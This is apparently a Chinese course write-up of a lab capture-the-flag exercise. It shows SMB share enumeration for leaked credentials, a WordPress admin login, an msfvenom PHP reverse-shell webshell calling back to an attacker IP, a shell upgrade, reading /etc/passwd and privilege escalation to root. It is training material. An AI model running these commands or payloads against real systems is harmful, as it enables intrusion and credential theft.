【网络安全0x03】SMB信息泄露
51CTO的网课,本篇针对SMB协议弱点分析,登录共享目录查找敏感文件;针对HTTP协议弱点分析,寻找突破点,登录后台上传webshell,提权获取flag。
本篇使用工具nmap、dirb、metasploit、webshell。
使用命令
nmap
探测靶场开放的服务与服务的版本
1
-- nmap -sV 靶场IP地址
探测靶场全部信息
1
-- nmap -A -v -T4 靶场IP地址
dirb
- 挖掘靶场网站敏感信息
1 | dirb 靶场IP地址 |
smbclient
- 空口令/弱口令尝试登录,获取敏感文件
1 | smbclient -L 靶机IP |
- 针对SMB协议远程溢出漏洞进行分析
1 | searchsploit samba版本号 |
mysql
- 登录
1 | mysql -h 靶机IP -u Admin -p 口令 |
metasploit
- 启动监听
1 | msfconsole |
webshell
- 生成webshell
1 | #制作webshell |
- 上传webshell
1 | #使用找到的敏感信息登录后台,上传并执行webshell |
shell优化
- 优化会话显示带用户、目录的命令行界面
1 | python -c "import pty;pty.spawn('/bin/bash')" |
渗透记录
- nmap扫描靶机IP地址开放端口、系统信息等:
1 | nmap -sV 192.168.1.113 |
- 访问smb服务,搜集敏感信息,share共享文件夹里可能有敏感信息:
1 | smbclient -L 192.168.1.113 |
- 都查看一下,找到两个敏感文件
\share\deets.txt和\share\wordpress\wp-config.php:
- 利用搜集到的秘钥尝试连接mysql和ssh,均被拒绝:
- smb协议也可以用metasploit搜索可利用漏洞,这里无可利用漏洞:
1 | searchsploit Samba smbd 3.X - 4.X |
- dirb搜索目录,查找可利用文件,找到了登录后台:
1 | dirb http://192.168.1.113 |
- 尝试使用前面的mysql密码成功登录:
- 生成反弹webshell脚本:
1 | msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.114 lport=4444 -f raw > /root/Desktop/shell.php |
- metaspolit开启监听:
1 | msfconsole |
- 网页后台上传webshell:
1 | #使用找到的敏感信息登录后台,上传并执行webshell |
- 访问404网页,可以看到反弹shell成功:
- 进入shell,优化输入,尝试切换root用户,失败:
1 | python -c "import pty;pty.spawn('/bin/bash')" |
- 查看用户组,发现togie在
/home目录下,是一个用户:
1 | cat /etc/passwd |
- 切换到用户togie,密码是前面第3步搜集到的
12345,查看权限,提权:
1 | su togie |
- 提权成功,切换到根目录,拿到flag:
